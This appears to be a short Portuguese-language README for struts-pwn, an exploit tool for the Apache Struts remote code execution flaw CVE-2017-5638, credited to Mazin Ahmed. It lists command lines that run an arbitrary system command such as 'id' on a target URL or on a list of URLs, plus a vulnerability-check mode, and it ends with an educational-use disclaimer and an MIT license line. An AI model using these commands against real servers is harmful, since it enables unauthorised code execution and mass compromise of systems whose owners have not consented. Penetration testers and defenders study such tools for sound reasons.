
Um exploit para Apache Struts CVE-2017-5638
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --list 'urls.txt' -c 'id'
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'
python struts-pwn.py --check --list 'urls.txt'
Este projeto foi feito apenas para fins educacionais e de testes éticos. O uso do struts-pwn para atacar alvos sem consentimento mútuo prévio é ilegal. É de responsabilidade do usuário final obedecer todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.
O projeto está licenciado sob a Licença MIT.
Mazin Ahmed